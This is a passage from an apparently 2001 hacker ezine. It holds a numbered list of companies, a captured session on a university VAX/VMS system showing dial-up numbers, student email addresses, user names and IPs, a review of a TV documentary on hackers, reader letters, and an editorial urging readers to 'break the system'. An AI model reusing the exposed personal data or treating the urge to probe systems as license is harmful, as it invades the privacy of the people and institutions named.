Fred Prire's semiares - USA 873 - Advertising agentsy - USA 859 - Hotel "vienene" on the Las Vegas strip - USA 855 - Photomask - USA 851 - Work Station Direct - USA 838 - Phyisition recutor - USA, Saltlake City 836 - Grenich assosiots - USA 832 - Grenich assosiots - USA 831 - Prolife - USA 823 - ? 819 - Corning Optical Fiber - USA 818 - Pulmary Data Service - USA 813 - Kenco constructions - USA 697 - Job searcher - USA 616 - Nordea(bank) - Germany, Stokhome 592 - Vestass(make wind turbines) - Denmark 577 - www.ekit.com - Austrilia 556 - Leo Pharmisutical bind test line - USA 527 - Barofoten - Germany 524 - Trela - Denmark 523 - ? - Germany 519 - Denfeild - Denmark 517 - Trela - Denmark 507 - IBMs ordering center - England 467 - American Association of blood banks 466 - Ace hardware housing - USA 463 - Future electronic components retaler - USA 448 - Quinthouse Transnational quality assurance hotline - USA 447 - Citizens banking cooperation(bank) - USA 441 - Data Stream - USA 437 - Mental Health conseling authorising service - USA 421 - City Bank(bank) - Germany 420 - Koki informatoion suport center - USA 417 - Kinsami investigation for missing persons - USA 399 - TV making factory - Denmark 396 - " 395 - " 394 - " 393 - " 392 - " 391 - " 351 - Musolf car transprt - Germany 103 - Drensnt(bank) - Luxemberg, Geneva 099 - AFA automobiles - Germany 097 - AFL cable harness maker - Hungry 083 - Client Logic - USA 075 - American Express - USA 074 - City Bank(bank) - USA 073 - Audit - USA 064 - Enterprise solution line, car rentor - USA 055 - Mega capital investments - USA 048 - Morgen(bank) - USA 031 - Western Process Computers - USA 030 - Brokarage firm - USA 029 - Helix(cryogenic pumps manufacturer) - USA 67 companys Page 3 -->11. ON THE INSIDE - THE SCSU VAX/VMS For those of you fortunate enough not to go to this school, I wanted to give you a chance to see what the inside of their VAX/VMS looks like. Please note that this is the first of our new "On the Inside" series where we will show you the inside of systems you may not have the privilege (or horror) of seeing. Some information has been omitted, but most still remains. Please exercise caution with any information found from computers in this series. (NOTE: If you wish to submit your own "On the Inside" article, please send it to articles@hackermind.net. Remember, this is only meant as a way of seeing what different systems look like, you need NOT have root privileges.) telnet scsu.ctstateu.edu SCSU VAX 7000-630 Username: XXXXXXXXX Password: XXXXXXXX ***************************************************************************** * Welcome to the SCSU VAX System * ***************************************************************************** Academic Computer Center (JE 155) 392-6285 Director of Academic Computing (JE221) 392-6295 Computer Center Office (JE 133) 392-6275 Data and I/O Control (JE 156) 392-6282 Computer Operations (JE 153) 392-6287 Installation/Repair (JE 153) 392-6288 MacIntosh Laboratory (BU 25) 392-6291 Systems & Programming (JE 132) 392-6277 System Manager (JE 132) 392-6279 ***************************************************************************** UNIVERSITY COMPUTER EQUIPMENT AND ACCOUNTS ARE INTENDED FOR LEGITIMATE ACADEMIC AND ADMINISTRATIVE USE ONLY. INDIVIDUALS USING UNIVERSITY COMPUTER RESOURCES FOR ANYTHING OTHER THAN ITS INTENDED PURPOSE ARE RISKING FORFEITURE OF THEIR COMPUTING PRIVILEGES. ***************************************************************************** For information on dialup lines, enter DIALINFO at the $ prompt. For campus information or announcements, type INFO at the $ prompt ***************************************************************************** Press RETURN to continue... *** You are currently logged onto node SCSUD $ DIALINFO Dial-up acess to SCSU is available through the following numbers: Phone Number Speed -------------------------------------------------------- (203)397-4196 1200/2400 (203)397-4141 12/24/9600 \ (203)397-4144 12/24/9600 / (10 lines w/rollover) Your terminal emulation software should be set to - ANSI or VT series terminal emulation - 8 bits/no parity OR 7 bits/space parity - XON/XOFF At the local> prompt, enter "CONNECT SCSU". $MAIL MAIL> READ #1 31-JAN-2001 12:55:55.94 MAIL From: SMTP%"COLLISON@SCSUD.CTSTATEU.EDU" To: XXXXXXXXXXXX CC: Subj: GRAND OPENING CELEBRATION - Southern New England Federal Credit Union Return-Path: Received: by SCSUD.CTSTATEU.EDU; Wed, 31 Jan 2001 12:11:02 -0500 Date: Wed, 31 Jan 2001 12:11:02 -0500 From: Steven Collison - SCSU Data Center To: HAAN_E@southernct.edu, HABIB_L@southernct.edu, HABIB_S@southernct.edu, HAGANST@southernct.edu, HAINESC@southernct.edu, HAINESM@southernct.edu, HAINES_K@southernct.edu, HAJJARJ@southernct.edu, HALKIASR@southernct.edu, HALLABECK_W@southernct.edu, HALLERAN_B@southernct.edu, HALLINAN_B@southernct.edu, HALLINAN_J@southernct.edu, HALLJ@southernct.edu, HALLL@southernct.edu, HALLT@southernct.edu, HALLYK@southernct.edu, HALL_A@southernct.edu, HALL_E@southernct.edu, HALL_M@southernct.edu, HALL_S@southernct.edu, HALVATGIS_K@southernct.edu, HAMELIN_R@southernct.edu, HAMIDA@southernct.edu, HAMIDI@southernct.edu, HAMILTONL@southernct.edu, HAMILTON_C@southernct.edu, HAMILTON_G@southernct.edu, HAMULAK_T@southernct.edu, HANEA@southernct.edu, HANELIUS_G@southernct.edu, HANEM@southernct.edu, HANE_H@southernct.edu CC: COLLISON@SCSUD.CTSTATEU.EDU X-Vmsmail-To: @student2.dis X-Vmsmail-Cc: COLLISON Message-Id: <010131121102.20302052@SCSUD.CTSTATEU.EDU> Subject: GRAND OPENING CELEBRATION - Southern New England Federal Credit Union Please mark your calendar to attend the grand opening celebration of the on-campus branch of Southern New England Federal Credit Union. The celebration is from 2:00pm to 6:00pm TODAY! Wednesday, January 31, 2001. REFRESHMENTS WILL BE SERVED!!! Come find out what SNEFCU has to offer the SCSU community. All SCSU faculty/staff/students and members of their Press RETURN for more... MAIL> EXIT $FINGER Monday, July 30, 2001 6:01AM-EDT Up 106 20:55:19 5+0 Jobs on SCSUD Load ave 0.00 0.00 0.00 User Personal Name Job Subsys Terminal Console Location LESIEUR Lesieur, Matt 202060AB *DCL* 7:56.NTY3193hyperion.southernc XXXXXXXX XXXXX, XXXX 2032BCBD FINGER XXXXXXXXXXXXXXXX SIESER Sieser,David 202A6030 *DCL* 1:01.NTY2411[149.152.191.120] YOUNG Young,John 20377DF6 *DCL* 1:19.NTY3549[149.152.186.1] 203A721F *DCL* 1:19.NTY3433[149.152.186.1] $HELP HELP The HELP command invokes the HELP Facility to display information about a command or topic. In response to the "Topic?" prompt, you can: o Type the name of the command or topic for which you need help. o Type INSTRUCTIONS for more detailed instructions on how to use HELP. o Type HINTS if you are not sure of the name of the command or topic for which you need help. o Type /MESSAGE for help with the HELP/MESSAGE utility. o Type a question mark (?) to redisplay the most recently requested text. o Press the Return key one or more times to exit from HELP. You can abbreviate any topic name, although ambiguous abbreviations result in all matches being displayed. Additional information available: := = @ ACCOUNTING ACS ADA ADVISE ALLOCATE ANALYZE APPEND ASSIGN ATTACH AUTHORIZE AUTOGEN BACKUP BASIC BLOCK CALL CANCEL CC CDD CDDL CDDV CDDX CDD_PLUS CDD_REPOSITORY CDO CLOSE COBOL CONNECT CONTINUE CONVERT COPY CREATE CXXDEMANGLE DATATRIEVE DEALLOCATE DEASSIGN DEBUG DECK DECRDB DECthreads DEFINE DEFRAGMENT DELETE DEPOSIT DICTIONARY DIFFERENCES DIRECTORY DISABLE DISCONNECT DISKEEPER_Plus DISKQUOTA DISMOUNT DMU Documentation DSR DUMP EDIT ENABLE ENCRYPT ENDSUBROUTINE EOD EOJ Errors ETHERnim EXAMINE EXCHANGE EXIT FDL FLM FLM2 FONT Format_of_error FORMS FORTRAN GATEWAY GENCAT GO GOSUB GOTO GRLOOK HELP Hints ICONV IF INITIALIZE INQUIRE INSTALL Instructions Internet JOB Kermit LANCP LATCP Lexicals LIBRARY LICENSE Line_editing LINK LISP LMCP LOCALE LOGIN LOGOUT LPS_CONSOLE LPS_PRISM MACRO MAIL MAPLE MCR MERGE MESSAGE MINITAB MINT MINUTEMAN MONITOR MOUNT MPR NCP NCS NOTES ON OPEN PASCAL PASSWORD PATCH PERFORMANCE PHONE PRINT PRINT_Parameter PRODUCT PSERVER PSWRAP PURGE Queues RAF RDBPRE RDBPRE42 RDBVMS RDBVMS42 RDML RDO RDO42 READ RECALL RECOVER RENAME REPLY REPOSITORY REQUEST RETURN RMS RMU RMU42 RTL_Routines RUN RUNOFF SCRIPT ScriptServer SEARCH SET SHOW SmartStar SNAPRE SNA_RJE SNA_Terminals SORT SPAWN Specify SPM SPSS SPSSX SQL SQLMOD SQLPRE SQL_SERVICES42 START STOP SUBMIT SUBROUTINE Symbol_Assign SYNCHRONIZE SYSGEN SYSMAN System_Files System_Services TDMS TFF TSM TYPE UIL UNLOCK V55_NewFeatures V62_Features VAXsim VDM VIEW VPA WAIT WRAP WRITE Additional help libraries available (type @name for topics): MULTINET Topic? LOGIN LOGIN Initiates an interactive terminal session. Format Additional information available: Qualifiers /CLI /COMMAND /DISK /NEW_PASSWORD /TABLES Examples LOGIN Subtopic? ^Z EXIT $ LOGOUT 12. REVIEW "HACKERS: COMPUTER OUTLAWS" First airing on TLC (The Learning Channel) on July 25th, 2001, "Hackers: Computer Outlaws" was mainly concerned with the good ole days of phone phreaking. Throughout the hour the topic moved on to groups like the Homebrew Computer Club and finally onto the Kevin Mitnick saga. Amazingly enough, the show actually allowed Mitnick a chance to refute the comments made by law enforcement agents as well as the infamous John Markoff. Sadly not all was right with this presentation, and we'll get to that in a moment, but first a brief overview. While some people claimed they focused too much on phone phreaks, I beg to differ. True, the show dedicated nearly a half hour to the topic, but let's not forget they had very good reason to. Phone phreaks were around long before computer hackers, and were essentially the "founding fathers" of the computer hackers we see today. I was pleased to see the show acknowledge this, rather than simply jumping right into the entire "WarGames" generation. Within that first half hour, viewers get a glimpse at not only some famous phone phreaks (Captain Crunch and his friend Denny, the man that taught him everything he knows) but also a very intimate look at what drives them. For a person who fancies himself a phone phreak I was very pleased that common people could finally understand why phone phreaks do what they do, without any mention of "phone fraud." Later, the show moved onto the Homebrew Computer Club, and more prominently, Steve Wozniak (co-founder of Apple Computer, alongside Steve Jobs). Wozniak, or "Woz" as he's commonly known, is shown to be a man who knows literally everything there is to know about computers. Another plus, he's referred to as a hacker. Sure Woz doesn't exactly fit the typical stereotype of a computer hacker, but none of these guys do. Which is why it's so great that the public gets to see them for who they are, rather than hearing about their ominous sounding names on the news. And while we're on the subject of ominous sounding names, perhaps none struck fear into more computer users than the name Kevin Mitnick. And yet here, we're given an image of a friendly looking man in glasses explaining about why computers are so much fun. Where's the monster? Where's the man that deserved to be locked away for five years? Thankfully, the show realized that he didn't exist…and allowed the real Mitnick a chance to speak. The remainder of the show focused on Mitnick's saga, which we've all heard numerous times so I won't bother repeating it. I will mention though, that Mitnick is given an equal chance to speak, and seems to have been allowed to speak his true feelings. I suppose I'd never know what was edited and what wasn't, but from what I saw everything came through. Overall the hour was a pleasant one, but again…not everything was perfect. There was definitely a dark overtone, with a narrator who would be more appropriate in an old Vincent Price film. On top of this, there seemed to be the idea that hackers today are bad people, while those of the past were not. Don't get me wrong, I'm not going to say that hackers of the past were bad…but why must they demonize today's hacker culture? Just because the technology is different doesn't mean the spirit has changed. Fortunately, the hackers themselves were able to speak out for today's community of curiosity satisfiers, even though the show did not want to go that route. If you missed the show the first time around, be on the lookout for future airings. Aside from a few small technicalities (ie: acting like Captain Crunch could actually blue box nowadays, a scene taken WAY out of context) and the impression that hackers are bad today, the show did a fantastic job at showing the true hacker spirit. Our advice to TLC? Don't pretend like good hackers aren't around anymore. 13. CROSSTALK [Comments in this section come from a variety of sources, and are immediately followed by staff replies. There is no way to send in a letter for this particular section, choices are made from conversations, posts, or emails.] > - 05 / 15 / 01 - An extra 30 seconds to kill, the Ford hearing looms, the 2600 site is hijacked, how such a thing became possible because of a weird computer error, how disruptive this kind of a move can be, new fordreallysucks.com bumper stickers come out, plans for the caravan are finalized as Emmanuel collects a huge amount of music, selections from the soundtrack to "Freedom Downtime," Universal asks to use 2600 Magazine in the upcoming "K9-3 Private Eye" release, the listeners decide whether or not to grant permission, a three hour fundraiser is scheduled for next week, Talking Call Waiting and Call Intercept are introduced by Verizon, an example of the Metrocard being used to catch a criminal, the new "Evil 6" train that has automated announcements, a 13 year old kid in New Jersey commits suicide after being threatened with prison for hacking his school computer, how this kind of thing isn't uncommon, another student is threatened for writing a sexually explicit song about a teacher, a caller questions Izaac's value on the show, a caller is targetted by the MPAA, a story involving "terroristic threats" with animated stick figures. [As posted on http://www.2600.com/offthehook/2001/0501.html] REPLY> While not a comment to us, it's nice to see that Dash's story will always be remembered on 2600.com Ø Which came first, Hackermind or Frequency? [anonymous on IRC] REPLY> Nearly one year ago the decision to make an ezine dedicated to the hacker point of view popped into my head, along with the title "Frequency: Inside the Hacker Mind." The ezine was first and the online radio station came next. Originally the station was only meant as a place where hackers could suggest what kind of music they wanted to hear, a type of hacker request line where the music they asked for would be looped over and over. A bit of trivia, the first song to ever play over the now famous stream located at 166.90.148.114:9474 was The Verve's "Bitter Sweet Symphony." It played for an extremely small audience, but those that heard that first song come through their speakers in the wee hours of the morning could say they were there when Hackermind was first created. To this day the song still has some memories attached to it, and can be heard from time to time. The song really reflects the way hackers feel about the world, and about their unending struggle to be accepted as useful members of society in an oppressive world. Weeks later, it was decided that simply playing songs was not enough to truly express what was going on in the world. New stories were popping up everyday, and to only release a report of this once a month was not enough. It was decided then that a radio show should be created, and the rest is history. > My friend owns a hosting company, if you got a banner, or need some help getting a cool company backing you, he offered.... [Email from Bluedice] REPLY> We appreciate the offer, but even though we have a lot of problems finding web space and keeping archives…we feel this is a necessary loss when compared to selling ourselves to a company. Once you rely on someone else to pay your expenses, you're pretty much owned. But you have our sincerest thanks. 14. CLOSING ARGUMENTS Wow, it seems like just yesterday I was writing the Closing Arguments for Freq11. But then again, with all that's gone on in the world it also seems like an eternity. Dmitry Sklyarov was arrested, but after several protests Adobe backed down. Of course this doesn't mean that our wonderful US Department of "Justice" will back down, oh no, they're pursuing this head on. They can't let someone violate the DMCA, imagine if he marketed his software! Sure it was made with good intentions, and has several legitimate uses, but so what? He had to circumvent encryption to make it, and therefore he's viewed as a criminal. Gee, doesn't that sound familiar…. If anything good is to come of this, it's that more and more lawmakers are beginning to see just how ridiculous the DMCA really is. Sadly, groups like the MPAA and RIAA are major contributors to law enforcement agencies…so changing their minds will be challenging to say the least. But if nothing more, we're heading in the right direction. So what's going on in the world of technology? It appears that few people bother to patch vulnerabilities, as Unreal showed us with the IIS 4.0/5.0 problems. Amazing, several months ago we reported this bug on Hackermind and here we are with vulnerable servers popping up all over, will people ever learn? In the world of telephones we see that collect call prices are at an all time high, with even 1-800-COLLECT charging nearly 3 dollars for the "connection fee." AT&T regular collect calls are approximately 8 dollars for the first minute, and 38 cents each additional…but that all depends on who you ask. Yes that's right, even the phone companies themselves don't know how much a call will cost you. Have someone call you collect through MCI (10-10-222-0), and ask the operator what the charges will be…he or she will probably be stunned that you dare to ask such a question. So here we are, the end of summer. Or at least this is the last issue before many of you go back to school, and for yours truly it's back to the snake pit…this time as an upperclassman. We can only imagine what this year will hold, but I'm sure it will be one of curiosity and exploration. Remember, the world is a fascinating place. As a hacker you have the upper hand in many situations, you understand things that others do not. Use that to your advantage, and be sure to have fun. Sure they can arrest you for spray painting on your school, but for making all the payphones ring? Doubtful. Play it safe, but never stop exploring. And keep in mind that just because things have worked a certain way for years and years doesn't mean there aren't flaws. Find those flaws, get around things, and above all else break the system. -screamer 15. CREW Screamer Chaotix - Editor in Chief Dash Interrupt - Webmaster, Thought Criminal Da Peng - Network Operations DamienAK - Writer The Blue Giant - Writer Contributing Writers: Zed, EMPulse, Da Peng, Lone Ranger, Unreal, Nutrition-Facts, Gringo Blanka Cover Layout/Design: CryptoKnight Shout Outs: Radio New Zealand, Steve Wozniak, George Orwell, people who haven't asked for an account on my Linux box, Wiccanprincess, Jason Vento, EGM, all the people who weren't thanked in Screamer's 2600 article, the neighbors who keep the baby monitor on constantly, operators who transfer to 800#'s without question, AT&T(!) for their new 10-10-288-0 network, and finally the girl at CompUSA who thought I was cute and didn't even check my bag. Send article/cover submissions to articles@hackermind.net along with the name you wish to be recognized by as well as a title for your work. Tune in to Hackermind, Thursday's at 10PM Eastern, by opening location 166.90.148.114:9474 with Winamp or Real Player. "This is MCI with a collect call from Dash, will you accept the charges?" "What are the charges?" "I…don't know sir…" "You don't know how much this is going to cost me?!" "No…sir…" -MCI not knowing how much their own calls cost. "But mom I'm a fuckin' phreak!" -What not to say to a parent when the phone bill arrives. "Hey Scream? Howsa bout you NOT DoS my comp this time?" -Dash, I deny everything. WWW.HACKERMIND.NET